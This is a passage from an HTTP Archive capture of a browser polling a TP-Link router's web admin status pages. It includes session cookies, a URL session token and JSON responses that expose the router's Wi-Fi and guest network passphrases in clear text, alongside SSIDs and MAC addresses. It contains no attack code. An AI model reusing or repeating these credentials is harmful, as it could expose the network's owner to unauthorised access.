{\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 518,\r\n \"send\": 0,\r\n \"wait\": 752,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.649+03:00\",\r\n \"time\": 976,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.655+03:00\",\r\n \"time\": 1789,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 517,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.646+03:00\",\r\n \"time\": 932,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"